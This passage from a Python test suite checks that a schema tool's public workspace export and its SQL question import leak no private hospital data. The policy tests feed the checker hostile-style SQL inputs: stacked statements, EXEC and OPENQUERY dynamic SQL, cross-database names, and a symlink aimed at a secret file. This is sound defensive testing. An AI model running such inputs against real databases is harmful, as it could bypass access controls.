"""The public workspace and the one-way import of a question from it, on the invented world only.

A repository with planted files is made in a temporary folder by copying the allowlisted public sources and planting
files beside them, so that no test reads anything outside the allowlist of the real repository.
"""
import ast
import csv
import json
import os
import re
import shutil
import subprocess
import sys
from pathlib import Path

import pytest

from schemalyser import audit, describe, rolemap, rolepolicy, roleshadow, workspace

ROOT = workspace.ROOT
DATE = "2026-10-07"
EXAMPLE = f"queries/{workspace.EXAMPLE}"


def _catalogue_names():
    names = set()
    with (ROOT / "fixtures" / "invented-catalogue.csv").open(encoding="utf-8", newline="") as f:
        for row in csv.DictReader(f):
            names |= {row["TABLE_NAME"], row["COLUMN_NAME"]}
    return {n for n in names if re.fullmatch(r"[A-Z][A-Z0-9]*_[A-Z0-9_]+", n or "")}


@pytest.fixture(scope="module")
def exported(tmp_path_factory):
    out = tmp_path_factory.mktemp("export") / "workspace"
    manifest = workspace.export(out, "public", date=DATE)
    return out, manifest


def _copy_repository(target):
    """A repository that holds the allowlisted public sources, with the planted neonates from which the export takes
    the planted rows, and nothing else."""
    for relative in list(workspace.sources(ROOT)) + [workspace.PLANTED_NEONATES]:
        destination = target / relative
        destination.parent.mkdir(parents=True, exist_ok=True)
        shutil.copyfile(ROOT / relative, destination)
    return target


@pytest.fixture()
def planted(tmp_path):
    repo = _copy_repository(tmp_path / "repo")
    (repo / "reference").mkdir()
    (repo / "reference" / "secret-schema.csv").write_text("PLANTED_REFERENCE_TABLE,PLANTED_REFERENCE_COLUMN\n")
    (repo / "notes").mkdir()
    (repo / "notes" / "plan.md").write_text("PLANTED_NOTE\n")
    (repo / "docs").mkdir()
    (repo / "docs" / "extra.md").write_text("A public page that no allowlist entry names.\n")
    return repo


@pytest.fixture()
def project(tmp_path):
    folder = tmp_path / "hospital-project"
    (folder / "schemas").mkdir(parents=True)
    (folder / "schemas" / "hospital-schema.schemalyser.zip").write_bytes(workspace.invented_schema(ROOT, DATE))
    return folder


def _question_folder(exported, tmp_path, name="low_pressure", sql=None, extra=None):
    out, _ = exported
    folder = tmp_path / "ws" / "queries" / name
    shutil.copytree(out / EXAMPLE, folder)
    if sql is not None:
        (folder / "question.sql").write_text(sql, encoding="utf-8")
    for file_name, text in (extra or {}).items():
        (folder / file_name).write_text(text, encoding="utf-8")
    return folder


def _project_files(project):
    return sorted(p.relative_to(project).as_posix() for p in project.rglob("*") if p.is_file())


# The export.

def test_the_export_holds_the_allowlisted_sources_and_a_manifest_of_every_file(exported):
    out, manifest = exported
    on_disk = sorted(p.relative_to(out).as_posix() for p in out.rglob("*") if p.is_file())
    listed = sorted(f["path"] for f in manifest["files"])
    assert sorted(listed + ["manifest.json"]) == on_disk
    assert manifest["profile"] == "public"
    for entry in manifest["files"]:
        assert entry["sha256"] == workspace.sha256((out / entry["path"]).read_bytes())
        assert not entry["source"].startswith(("/", "reference", "etl")), entry
        assert entry["source"] == "generated by schemalyser.workspace" or (ROOT / entry["source"]).is_file()
    for wanted in ("core/schemalyser/rolemodel/contract.json", "core/schemalyser/rolemodel/roles.md",
                   "core/schemalyser/omop/cdm54_fields.csv", "fixtures/invented-catalogue.csv",
                   "fixtures/dictionary/invented-dictionary.csv", "fixtures/conversion/person.sql", "fixtures/map/map.json",
                   "tools/sqlserver/harness.py", "README.md", "QUERIES.md", f"schemas/{workspace.SCHEMA_NAME}",
                   f"{EXAMPLE}/question.sql", f"{EXAMPLE}/title.txt", f"{EXAMPLE}/note.md"):
        assert wanted in listed, wanted
    assert not any(p.split("/")[0] in ("reference", "etl", "notes", "docs", "site", "spike") for p in on_disk)
    readme = (out / "README.md").read_text(encoding="utf-8")
    assert "cannot see any hospital's mapping from those contracts to its database" in readme
    assert "!" not in readme and "!" not in (out / "QUERIES.md").read_text(encoding="utf-8")


def test_the_core_modules_of_the_allowlist_cover_everything_that_they_import():
    package = ROOT / "core" / "schemalyser"
    held = set(workspace.CORE_MODULES) | set(workspace.CORE_PACKAGES)
    modules = {p.stem for p in package.glob("*.py")} | {p.parent.name for p in package.glob("*/__init__.py")}
    # A module of the core is a file of the package, and a package of the core is a folder whose files import the
    # core from one level further up.
    files = [(module, package / f"{module}.py", 1) for module in workspace.CORE_MODULES]
    files += [(name, path, 2) for name in workspace.CORE_PACKAGES for path in sorted((package / name).glob("*.py"))]
    for module, path, level in files:
        tree = ast.parse(path.read_text(encoding="utf-8"))
        for node in ast.walk(tree):
            if isinstance(node, ast.ImportFrom) and node.level == level:
                names = [node.module.split(".")[0]] if node.module else [a.name for a in node.names]
                for name in names:
                    if name in modules:
                        assert name in held, f"{module} imports {name}, which the allowlist leaves out"


def test_a_planted_reference_and_an_unlisted_folder_never_reach_the_workspace(planted, tmp_path):
    out = tmp_path / "out"
    workspace.export(out, "public", repo=planted, date=DATE)
    paths = [p.relative_to(out).as_posix() for p in out.rglob("*") if p.is_file()]
    assert not any(p.startswith(("reference/", "notes/", "docs/")) for p in paths)
    for path in out.rglob("*"):
        if path.is_file():
            assert b"PLANTED_REFERENCE" not in path.read_bytes() and b"PLANTED_NOTE" not in path.read_bytes(), path


def test_a_file_outside_the_allowlist_is_refused_with_its_path_unless_it_is_listed(planted, tmp_path):
    with pytest.raises(workspace.WorkspaceError, match="docs/extra.md"):
        workspace.export(tmp_path / "one", "public", repo=planted, include=["docs/extra.md"], date=DATE)
    listed = workspace.ALLOWLIST + ({"path": "docs/extra.md", "why": "a test"},)
    workspace.export(tmp_path / "two", "public", repo=planted, allowlist=listed, include=["docs/extra.md"], date=DATE)
    assert (tmp_path / "two" / "docs" / "extra.md").is_file()
    denied = workspace.ALLOWLIST + ({"path": "reference/secret-schema.csv", "why": "a test"},)
    with pytest.raises(workspace.WorkspaceError, match="reference/secret-schema.csv"):
        workspace.export(tmp_path / "three", "public", repo=planted, allowlist=denied, date=DATE)
    assert not (tmp_path / "three").exists()


def test_a_file_of_the_wrong_kind_or_a_link_in_an_allowlisted_folder_is_refused(planted, tmp_path):
    (planted / "fixtures" / "conversion" / "minutes.docx").write_bytes(b"x")
    with pytest.raises(workspace.WorkspaceError, match="fixtures/conversion/minutes.docx"):
        workspace.export(tmp_path / "one", "public", repo=planted, date=DATE)
    (planted / "fixtures" / "conversion" / "minutes.docx").unlink()
    (planted / "fixtures" / "map" / "linked.sql").symlink_to(planted / "reference" / "secret-schema.csv")
    with pytest.raises(workspace.WorkspaceError, match="fixtures/map/linked.sql"):
        workspace.export(tmp_path / "two", "public", repo=planted, date=DATE)


def test_text_that_names_a_home_folder_is_refused(planted, tmp_path):
    (planted / "fixtures" / "map" / "role_note.sql").write_text("-- written in /Users/someone/project\n")
    with pytest.raises(workspace.WorkspaceError, match="fixtures/map/role_note.sql"):
        workspace.export(tmp_path / "out", "public", repo=planted, date=DATE)


def test_an_agent_in_the_workspace_can_check_assess_and_build_the_example_on_invented_data(exported, tmp_path):
    out, _ = exported
    work = tmp_path / "copy"
    shutil.copytree(out, work)
    env = dict(os.environ, PYTHONPATH="core", PYTHONDONTWRITEBYTECODE="1")

    def run(*args):
        return subprocess.run([sys.executable, *args], cwd=work, env=env, capture_output=True, text=True, timeout=300)

    found = run("-c", "import schemalyser, schemalyser.testbed; print(schemalyser.__file__)")
    assert found.returncode == 0, found.stderr
    assert Path(found.stdout.strip()).resolve().is_relative_to(work.resolve())
    assert run("-m", "schemalyser.workspace", "check", EXAMPLE).returncode == 0
    schema = f"schemas/{workspace.SCHEMA_NAME}"
    report = run("-m", "schemalyser.feasibility", "report", schema, f"{EXAMPLE}/question.sql")
    assert report.returncode == 0 and "expressible" in report.stdout, report.stderr
    built = run("-m", "schemalyser.audit", "build", schema, f"{EXAMPLE}/question.sql", "--out", "audits/example")
    assert built.returncode == 0, built.stderr
    manifest = json.loads((work / "audits" / "example" / "manifest.json").read_text(encoding="utf-8"))
    # The planted neonates' expected answers are held out, so the workspace's package checks no planted case.
    assert manifest["execution_class"] == "B" and manifest["planted_match"] is None


# The import.

def test_the_example_imports_cleanly_and_the_result_names_nothing_of_the_hospital(exported, project, tmp_path):
    folder = _question_folder(exported, tmp_path)
    result, _, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == "accepted" and result["rules_failed"] == []
    assert sorted(result) == ["query", "result", "rules_failed", "says"]
    assert result["says"] == workspace.WORDING["accepted"]
    text = (folder / "import-result.json").read_text(encoding="utf-8")
    assert json.loads(text) == result
    leaked = [name for name in _catalogue_names() if name in text]
    assert not leaked, leaked
    assert sorted(p.name for p in folder.iterdir()) == ["import-result.json", "note.md", "question.sql", "title.txt"]
    # The private project gains the question, the package and the validation report.
    questions = list((project / "questions").glob("*.sql"))
    assert [q.name for q in questions] == ["neonatal_low_mean_pressure.sql"]
    assert questions[0].read_text(encoding="utf-8").startswith("-- Neonatal low mean pressure.\n")
    assert (record / "package" / "query.sql").is_file() and (record / "package" / "manifest.json").is_file()
    validation = json.loads((record / "import-validation.json").read_text(encoding="utf-8"))
    assert validation["returned_to_workspace"] == result and all(r["passed"] for r in validation["rules"])
    assert json.loads((record / "request.json").read_text(encoding="utf-8"))["exit_code"] == 0


def test_a_question_that_names_a_table_outside_the_contract_is_refused_with_the_rule(exported, project, tmp_path):
    before = _project_files(project)
    folder = _question_folder(exported, tmp_path, sql="SELECT COUNT(*) AS anaesthetics FROM ANAES_RECORD\n")
    result, checked, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == "malformed" and result["rules_failed"] == ["tables"] and record is None
    assert sorted(result) == ["query", "result", "rules_failed", "says"]
    assert json.loads((folder / "import-result.json").read_text(encoding="utf-8")) == result
    assert _project_files(project) == before


def test_a_folder_with_an_extra_python_file_is_refused(exported, project, tmp_path):
    before = _project_files(project)
    folder = _question_folder(exported, tmp_path, extra={"helper.py": "import os\n"})
    result, checked, _ = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == "malformed" and result["rules_failed"] == ["files"]
    assert any("helper.py" in f for r in checked["rules"] for f in r["fragments"])
    assert _project_files(project) == before


def test_a_link_a_dependency_and_a_large_file_are_each_refused(exported, project, tmp_path):
    folder = _question_folder(exported, tmp_path, name="linked", extra={"requirements.txt": "requests\n"})
    (folder / "note.md").unlink()
    (folder / "note.md").symlink_to(project / "schemas" / "hospital-schema.schemalyser.zip")
    result, _, _ = workspace.import_question(folder, project, date=DATE)
    assert set(result["rules_failed"]) == {"links", "dependencies", "files"}
    large = _question_folder(exported, tmp_path, name="large", sql="-- " + "x" * workspace.SIZE_LIMIT + "\nSELECT 1 AS one\n")
    result, _, _ = workspace.import_question(large, project, date=DATE)
    assert result["rules_failed"] == ["size"]


# The role-level policy.

@pytest.mark.parametrize("sql, rule", [
    ("SELECT x.foo FROM role_anaesthetic x", "columns"),
    ("SELECT COUNT(*) AS n FROM role_reading r WHERE r.kind = 'blood_pressure'", "kinds"),
    ("SELECT UPPER(CAST(p.patient_key AS varchar(20))) AS k FROM role_patient p", "functions"),
    ("SELECT p.patient_key FROM otherdb.dbo.role_patient p", "names"),
    ("EXEC sp_who", "dynamic"),
    ("SELECT 1 AS one; SELECT 2 AS two", "statements"),
    ("SELECT p.patient_key INTO #kept FROM role_patient p", "statements"),
    ("SELECT d.sex FROM role_patient_detail d", "tables"),
    ("WITH c AS (SELECT patient_key FROM role_patient) SELECT c.birth_date FROM c", "columns"),
    ("SELECT * FROM OPENQUERY(other, 'SELECT 1')", "dynamic"),
])
def test_the_role_policy_names_the_rule_that_a_question_breaks(sql, rule):
    found = rolepolicy.check(sql)
    assert found["outcome"] == "failed" and rule in found["failed"], found["failed"]
    assert next(r for r in found["rules"] if r["id"] == rule)["fragments"]


def test_the_role_policy_passes_the_neonatal_audit():
    found = rolepolicy.check((ROOT / workspace.EXAMPLE_SOURCE).read_text(encoding="utf-8"))
    assert found["outcome"] == "passed", [r for r in found["rules"] if not r["passed"]]


def test_the_role_policy_lets_a_question_read_a_mapping_view_and_checks_the_capabilities_it_names():
    reads = ("-- capability: principal_diagnosis\n"
             "SELECT m.status, COUNT(*) AS n FROM role_anaesthetic a JOIN map_diagnosis_concept m ON m.local_key = a.anaesthetic_key "
             "WHERE m.status IN ('mapped', 'ambiguous') GROUP BY m.status")
    assert rolepolicy.check(reads)["outcome"] == "passed"
    assert rolepolicy.check(reads.replace("'ambiguous'", "'guessed'"))["failed"] == ["kinds"]
    assert rolepolicy.check(reads.replace("m.status,", "m.code,").replace("BY m.status", "BY m.code"))["failed"] == ["columns"]
    unknown = rolepolicy.check("-- capability: minutes_of_unicorns\nSELECT a.anaesthetic_key FROM role_anaesthetic a")
    assert unknown["failed"] == ["capabilities"]
    # A draft part stays closed to a question, whatever capability it names.
    assert "tables" in rolepolicy.check("-- capability: transfusion\nSELECT f.volume_ml FROM role_fluid f")["failed"]


def test_the_export_holds_the_mapping_views_and_the_catalogue_and_no_hospital_s_translation(exported):
    out, _ = exported
    model = json.loads((out / "core/schemalyser/rolemodel/contract.json").read_text(encoding="utf-8"))
    assert model["version"] == "1.1" and model["mapping_views"] and model["capabilities"]
    assert (out / "core/schemalyser/rolemodel/planted_concepts.json").is_file()
    queries = (out / "QUERIES.md").read_text(encoding="utf-8")
    assert "map_drug_concept" in queries and "-- capability: NAME" in queries and "fifteen further views" in queries
    # The invented schema in the workspace holds no translation of codes.
    import zipfile
    with zipfile.ZipFile(out / "schemas" / workspace.SCHEMA_NAME) as archive:
        assert "concepts" not in json.loads(archive.read("map/map.json"))
    # The invented map holds the translations of the invented world's own codes, under a salt that names the invented
    # hospital. Both are invented, so they belong to the public class of material and are exported; nothing else
    # exported carries a salt.
    salted = sorted(p.relative_to(out).as_posix() for p in out.rglob("*.json") if b'"salt"' in p.read_bytes())
    assert salted == ["fixtures/map/map.json"]
    invented = json.loads((out / "fixtures/map/map.json").read_text(encoding="utf-8"))
    assert invented["world"] == "the invented world" and invented["concepts"]["salt"] == "the invented hospital"


def test_a_real_schema_s_translations_never_reach_an_export(planted, tmp_path):
    """A map with translations and a salt that a hospital would hold is refused wherever it is planted: outside the
    allowlist by its path, and inside an allowlisted folder as a saved schema, which that folder may not hold."""
    secret = {"world": "QUARTERMAINE_HOSPITAL", "concepts": {"salt": "QUARTERMAINE_SALT", "views": {"map_drug_concept": {"rows": [
        {"code": "QUARTERMAINE_CODE", "description": "QUARTERMAINE_DESCRIPTION", "concept_id": 1, "status": "mapped"}]}}}}
    held = planted / "reference" / "hospital" / "map"
    held.mkdir(parents=True)
    (held / "map.json").write_text(json.dumps(secret), encoding="utf-8")
    with pytest.raises(workspace.WorkspaceError, match="reference/hospital/map/map.json"):
        workspace.export(tmp_path / "named", "public", repo=planted, include=["reference/hospital/map/map.json"], date=DATE)
    import io
    import zipfile
    schema = io.BytesIO()
    with zipfile.ZipFile(schema, "w") as archive:
        archive.writestr("map/map.json", json.dumps(secret))
    (planted / "fixtures" / "map" / "hospital-schema.schemalyser.zip").write_bytes(schema.getvalue())
    with pytest.raises(workspace.WorkspaceError, match="fixtures/map/hospital-schema.schemalyser.zip"):
        workspace.export(tmp_path / "inside", "public", repo=planted, date=DATE)
    (planted / "fixtures" / "map" / "hospital-schema.schemalyser.zip").unlink()
    out = tmp_path / "clean"
    workspace.export(out, "public", repo=planted, date=DATE)
    for path in out.rglob("*"):
        if path.is_file():
            assert b"QUARTERMAINE" not in path.read_bytes(), path



# The held-out fixtures never reach an export (A26).

def test_the_held_out_fixtures_the_planted_answers_and_the_planted_values_never_reach_an_export(exported, planted, tmp_path):
    out, manifest = exported
    listed = {f["path"] for f in manifest["files"]}
    assert "fixtures/planted-values.txt" not in listed and not any(p.startswith("fixtures/held-out") for p in listed)
    neonates = json.loads((out / workspace.PLANTED_NEONATES).read_text(encoding="utf-8"))
    assert "expectations" not in neonates and neonates["role_reading"]["rows"]
    entry = next(f for f in manifest["files"] if f["path"] == workspace.PLANTED_NEONATES)
    assert entry["source"] == "generated by schemalyser.workspace"
    # The planted inputs that are development fixtures stay.
    assert "fixtures/hospital/OBS_READING.csv" in listed or any(p.startswith("fixtures/hospital/") for p in listed)
    # A marker planted under fixtures/held-out is passed over inside an allowlisted folder and refused when named.
    held = planted / "fixtures" / "held-out" / "neonatal"
    held.mkdir(parents=True)
    (held / "expected.json").write_text('{"marker": "PLANTED_HELD_OUT"}\n')
    (planted / "fixtures" / "planted-values.txt").write_text("PLANTED_VALUE_NAME\n")
    wide = workspace.ALLOWLIST + ({"path": "fixtures", "tree": True, "suffixes": (".json", ".csv", ".sql", ".txt", ".tsv", ".py"),
                                   "why": "a test"},)
    first = tmp_path / "wide"
    workspace.export(first, "public", repo=planted, allowlist=wide, date=DATE)
    for path in first.rglob("*"):
        if path.is_file():
            data = path.read_bytes()
            assert b"PLANTED_HELD_OUT" not in data and b"PLANTED_VALUE_NAME" not in data, path
            assert b'"expectations"' not in data or path.name != "planted_neonates.json", path
    assert not (first / "fixtures" / "held-out").exists() and not (first / "fixtures" / "planted-values.txt").exists()
    for named in ("fixtures/held-out/neonatal/expected.json", "fixtures/held-out", "fixtures/planted-values.txt"):
        entry = {"path": named, "why": "a test"} if not named.endswith("held-out") else {"path": named, "tree": True, "suffixes": (".json",), "why": "a test"}
        with pytest.raises(workspace.WorkspaceError, match=re.escape(named)):
            workspace.export(tmp_path / "named", "public", repo=planted, allowlist=workspace.ALLOWLIST + (entry,), date=DATE)
        with pytest.raises(workspace.WorkspaceError, match=re.escape(named)):
            workspace.export(tmp_path / "included", "public", repo=planted, include=[named], date=DATE)


# The import's small refusals (A27).

def test_a_file_with_the_executable_bit_is_refused(exported, project, tmp_path):
    before = _project_files(project)
    folder = _question_folder(exported, tmp_path, name="executable")
    (folder / "note.md").chmod(0o755)
    result, checked, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == "malformed" and result["rules_failed"] == ["executable"] and record is None
    assert any("note.md is executable" in f for r in checked["rules"] for f in r["fragments"])
    assert _project_files(project) == before


# The status depends on the package and the public contract alone (A7).

def _schema_without_the_readings_link(path):
    """A saved schema of the invented world in which the readings are not linked to an anaesthetic, so that no
    package of the neonatal audit can be built from it."""
    fixtures = ROOT / "fixtures"
    sitting = describe.Describe()
    sitting.version = "test"
    sitting.load_dictionary((fixtures / "dictionary" / "invented-dictionary.csv").read_bytes(),
                            (fixtures / "dictionary" / "invented-tables.csv").read_bytes(), {},
                            "invented-dictionary.csv", "invented-tables.csv")
    sitting.propose(date=DATE)
    sitting.set_settings("production", 2024, "Australia/Sydney", True)
    sitting.tables_query()
    sitting.read_tables(workspace._tables_result(fixtures / "invented-catalogue.csv"))
    for about in workspace.CONFIRMED:
        if not about.startswith("role_reading"):
            sitting.confirm(about, "yes", date=DATE)
    sitting.data["roles"]["role_reading"]["columns"]["anaesthetic_key"]["binding"] = None
    path.write_bytes(roleshadow.save_zip(sitting, DATE))
    return path


ROW_LEVEL = ("WITH chosen AS (SELECT a.anaesthetic_key, a.start_time FROM role_anaesthetic a)\n"
             "SELECT c.anaesthetic_key, r.value FROM chosen c JOIN role_reading r ON r.anaesthetic_key = c.anaesthetic_key\n")


@pytest.mark.parametrize("sql, status", [(None, "accepted"), (ROW_LEVEL, "requires_private_review")])
def test_one_package_returns_the_same_status_from_a_hospital_that_supports_it_and_one_that_does_not(
        exported, project, tmp_path, sql, status):
    without = tmp_path / "without-project"
    (without / "schemas").mkdir(parents=True)
    _schema_without_the_readings_link(without / "schemas" / "hospital-schema.schemalyser.zip")
    results, records = [], []
    for name, hospital in (("supports", project), ("lacks", without)):
        folder = _question_folder(exported, tmp_path / name, sql=sql)
        result, _, record = workspace.import_question(folder, hospital, date=DATE)
        results.append(result)
        records.append(json.loads((record / "import-validation.json").read_text(encoding="utf-8")))
        assert (folder / "import-result.json").read_text(encoding="utf-8") == json.dumps(result, indent=2) + "\n"
    assert results[0] == results[1] and results[0]["result"] == status
    if sql is None:
        # The private build differs between the two hospitals, and only the owner's report says so.
        assert records[0]["package"] == "package" and records[1]["package"] is None
        assert records[1]["build_failure"]["error"] == "AuditError"


@pytest.mark.parametrize("sql", [None, ROW_LEVEL, "SELECT COUNT(*) AS anaesthetics FROM ANAES_RECORD\n"])
def test_the_workspace_s_own_check_gives_the_status_that_the_import_returns(exported, project, tmp_path, sql):
    folder = _question_folder(exported, tmp_path, sql=sql)
    checked = workspace.check_folder(folder)
    result, _, _ = workspace.import_question(folder, project, date=DATE)
    assert checked["status"] == result["result"]


def test_a_question_that_provokes_an_error_in_the_private_build_returns_only_its_status(exported, project, tmp_path):
    # A question that passes every public rule but has no step from which part 2 could reach the readings.
    sql = "SELECT COUNT(*) AS readings FROM role_reading r WHERE r.kind = 'map_arterial'\n"
    folder = _question_folder(exported, tmp_path, sql=sql)
    result, _, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == "requires_private_review" and sorted(result) == ["query", "result", "rules_failed", "says"]
    text = (folder / "import-result.json").read_text(encoding="utf-8")
    assert "Schemalyser cannot" not in text and "OBS_" not in text and str(project) not in text
    validation = json.loads((record / "import-validation.json").read_text(encoding="utf-8"))
    assert validation["build_failure"] is not None and validation["public_form"] == ["cohort"]


# Carried from the earlier boundary's tests (B8). What they protected now lives in the import: a hostile question puts
# nothing of its own into what returns to the workspace, and neither the module nor an import opens a network module.

HOSTILE = """-- Zanzibarine note: Quartermaine asked for this, and the result goes to xylophonist@example.com.
"""
HOSTILE_WORDS = ("zanzibarine", "xylophonist", "quartermaine")


def _returned_words(text):
    """The words of import-result.json that are not the import's own: its fields, statuses, rules and wording."""
    own = set(workspace.RESULT_FIELDS) | set(workspace.RESULTS) | set(workspace.FOLDER_RULES)
    own |= {r["id"] for r in rolepolicy.check("SELECT 1")["rules"]}
    for sentence in workspace.WORDING.values():
        own |= set(re.findall(r"[A-Za-z_]+", sentence))
    return {w for w in re.findall(r"[A-Za-z_]+", text) if w not in own}


@pytest.mark.parametrize("hostile", ["comments", "tables", "files"])
def test_a_hostile_question_puts_nothing_of_its_own_into_what_returns_to_the_workspace(exported, project, tmp_path, hostile):
    out, _ = exported
    sql = (out / EXAMPLE / "question.sql").read_text(encoding="utf-8")
    extra = {}
    if hostile == "comments":
        # A question that passes every rule, with hostile words in its comment, its title and its note.
        sql = HOSTILE + sql
        extra = {"title.txt": "Zanzibarine Xylophonist\n", "note.md": "Quartermaine wrote this for Xylophonist.\n"}
    elif hostile == "tables":
        sql = HOSTILE + ("SELECT 'Zanzibarine' AS Xylophonist, z.Quartermaine FROM Zanzibarine_Table AS z;\n"
                         "EXEC('SELECT * FROM Zanzibarine_Secret');\n")
    else:
        extra = {"Zanzibarine.sql": "SELECT 1 AS Xylophonist\n", "requirements.txt": "quartermaine\n"}
    folder = _question_folder(exported, tmp_path, sql=sql, extra=extra)
    before = sorted(p.name for p in folder.iterdir())
    result, _, _ = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == ("accepted" if hostile == "comments" else "malformed")
    text = (folder / workspace.RESULT).read_text(encoding="utf-8")
    assert not [word for word in HOSTILE_WORDS if word in text.lower()]
    # The one word that is not the import's own is the folder's name, which the agent chose.
    assert _returned_words(text) == {"low_pressure"}
    # Nothing returns to the workspace but import-result.json.
    assert sorted(p.name for p in folder.iterdir()) == sorted(before + [workspace.RESULT])


def test_the_module_and_an_import_open_no_network_module(exported, project, tmp_path):
    # What the interpreter and the parser import is not the tool's doing: on Linux, sqlglot reads its own version
    # through a standard module that pulls in the email package, which imports socket without opening a connection.
    # So only what the import adds beyond its dependency is counted.
    folder = _question_folder(exported, tmp_path)
    code = (
        "import sys\n"
        "network = ('socket', 'ssl', 'http.client', 'urllib.request', 'urllib3', 'requests', 'httpx')\n"
        "import sqlglot\n"
        "at_start = {m for m in network if m in sys.modules}\n"
        "import schemalyser.workspace as w\n"
        "assert 'duckdb' not in sys.modules, 'duckdb at import'\n"
        f"assert w.check_folder({str(folder)!r})['status'] == 'accepted'\n"
        f"result, _, _ = w.import_question({str(folder)!r}, {str(project)!r}, date={DATE!r})\n"
        "assert result['result'] == 'accepted', result\n"
        "print(sorted(m for m in network if m in sys.modules and m not in at_start))\n"
    )
    done = subprocess.run([sys.executable, "-c", code], capture_output=True, text=True, cwd=ROOT / "core",
                          env={**os.environ, "PYTHONPATH": str(ROOT / "core")}, timeout=300)
    assert done.returncode == 0, done.stderr
    assert done.stdout.strip().splitlines()[-1] == "[]"


# A private hospital schema with planted names, exported beside and imported into (B3). The schema is made from the
# invented dictionary with three of its names replaced by planted ones, so that its bindings, its named normalisation,
# its journal and its concept translations all carry a name that no public file holds. Nothing of it may reach the
# exported workspace or any status that returns to the agent.

PLANTED_RENAMED = {"OBS_SHEET": "PLANTED_PRIVATE_SHEET", "READ_VALUE": "PLANTED_PRIVATE_VALUE", "VISIT": "PLANTED_PRIVATE_VISIT"}
PLANTED_PRIVATE = tuple(PLANTED_RENAMED.values()) + ("PLANTED_PRIVATE_CODE", "PLANTED_PRIVATE_DESCRIPTION",
                                                     "PLANTED_PRIVATE_NOTE", "PLANTED_PRIVATE_HOSPITAL")


def _planted_text(path):
    text = path.read_text(encoding="utf-8")
    for name, planted in PLANTED_RENAMED.items():
        text = re.sub(rf"\b{name}\b", planted, text)
    return text


def _planted_tables_result():
    lines = _planted_text(ROOT / "fixtures" / "invented-catalogue.csv").strip().splitlines()
    head = ["TABLE_SCHEMA", "TABLE_NAME", "COLUMN_NAME", "ORDINAL_POSITION", "DATA_TYPE", "CHARACTER_MAXIMUM_LENGTH",
            "NUMERIC_PRECISION", "NUMERIC_SCALE", "IS_NULLABLE"]
    rows = [dict(zip(lines[0].split(","), line.split(","))) for line in lines[1:]]
    out = ["\t".join(head + ["TABLE_ROWS"])] + ["\t".join([r[k] or "NULL" for k in head] + ["1000"]) for r in rows]
    return "\n".join(out) + "\n"


def planted_private_schema():
    """The bytes of a saved hospital schema whose bindings, normalisation, journal and concept translations carry the
    planted names, made as the page makes one."""
    fixtures = ROOT / "fixtures" / "dictionary"
    s = describe.Describe()
    s.version = "test"
    s.settings["hospital"] = "PLANTED_PRIVATE_HOSPITAL"
    s.load_dictionary(_planted_text(fixtures / "invented-dictionary.csv").encode("utf-8"),
                      _planted_text(fixtures / "invented-tables.csv").encode("utf-8"), {},
                      "planted-dictionary.csv", "planted-tables.csv")
    s.propose(date=DATE)
    s.set_settings("production", 2024, "Australia/Sydney", True)
    s.tables_query()
    s.read_tables(_planted_tables_result())
    for about in workspace.CONFIRMED:
        s.confirm(about, "yes", note="PLANTED_PRIVATE_NOTE" if about == "role_reading.value" else "", date=DATE)
    s.choose_codes("role_reading.kind", dict(workspace.CODES), DATE)
    roleshadow.correction_keep(s, {"form": "path", "about": "role_anaesthetic.patient_key", "column": "PERSON_KEY",
                       "steps": [{"from": "CASE_KEY", "table": "THEATRE_CASE", "to": "CASE_KEY"},
                                 {"from": "VISIT_KEY", "table": "PLANTED_PRIVATE_VISIT", "to": "VISIT_KEY"}]}, date=DATE)
    s.translate_concepts("map_drug_concept", [{"code": "PLANTED_PRIVATE_CODE", "description": "PLANTED_PRIVATE_DESCRIPTION",
                                               "concept_id": 1, "status": "mapped", "provenance": "a person"}], DATE)
    return roleshadow.save_zip(s, DATE)


def _planted_in(data):
    return [name for name in PLANTED_PRIVATE if name.encode("utf-8") in data]


@pytest.fixture(scope="module")
def planted_schema():
    data = planted_private_schema()
    import io
    import zipfile
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        files = {name: archive.read(name) for name in archive.namelist()}
    # Each planted name is held where the test means it to be, so that its absence below means something.
    mapped = json.loads(files["map/map.json"])
    assert mapped["roles"]["role_reading"]["columns"]["anaesthetic_key"]["binding"]["table"] == "PLANTED_PRIVATE_SHEET"
    assert mapped["roles"]["role_reading"]["columns"]["value"]["binding"]["column"] == "PLANTED_PRIVATE_VALUE"
    assert any(i["table"] == "PLANTED_PRIVATE_VISIT" for n in mapped["normalisations"].values() for i in n["inputs"])
    assert mapped["concepts"]["views"]["map_drug_concept"]["rows"][0]["description"] == "PLANTED_PRIVATE_DESCRIPTION"
    journal = files["journal.json"]
    assert all(name.encode() in journal for name in ("PLANTED_PRIVATE_NOTE", "PLANTED_PRIVATE_HOSPITAL", "PLANTED_PRIVATE_CODE"))
    return data


def _fixed_status(result, name):
    """Asserts that a status is the fixed one of the contract and nothing else: the folder's own name, a word of RESULTS,
    the names of rules, and the fixed sentence for the status."""
    rules = set(workspace.FOLDER_RULES) | {r["id"] for r in rolepolicy.check("SELECT 1")["rules"]}
    assert sorted(result) == sorted(workspace.RESULT_FIELDS)
    assert result["query"] == name and result["result"] in workspace.RESULTS
    assert set(result["rules_failed"]) <= rules and bool(result["rules_failed"]) == (result["result"] == "malformed")
    assert result["says"] == workspace.WORDING[result["result"]]


def _leaks(text, *paths):
    """What a returned text holds that it must not: a planted name, a path, or a diagnostic."""
    found = [name for name in PLANTED_PRIVATE if name.lower() in text.lower()]
    found += [str(p) for p in paths if str(p) in text]
    found += [word for word in ("Traceback", "Error", "Exception", "line ", "sqlglot", ".py", "/", "\\") if word in text]
    return found


@pytest.mark.parametrize("sql, status", [
    (None, "accepted"),
    (ROW_LEVEL, "requires_private_review"),
    ("SELECT COUNT(*) AS n FROM PLANTED_PRIVATE_SHEET s WHERE s.PLANTED_PRIVATE_VALUE > 0\n", "malformed"),
])
def test_a_private_schema_with_planted_names_reaches_neither_the_export_nor_any_status(
        exported, planted, planted_schema, tmp_path, sql, status):
    # The planted project sits beside the repository's public sources, and its saved schema in reference/ as well.
    project = planted / "hospital-project"
    (project / "schemas").mkdir(parents=True)
    (project / "schemas" / "hospital-schema.schemalyser.zip").write_bytes(planted_schema)
    (planted / "reference" / "hospital-schema.schemalyser.zip").write_bytes(planted_schema)
    out = tmp_path / "out"
    workspace.export(out, "public", repo=planted, date=DATE)
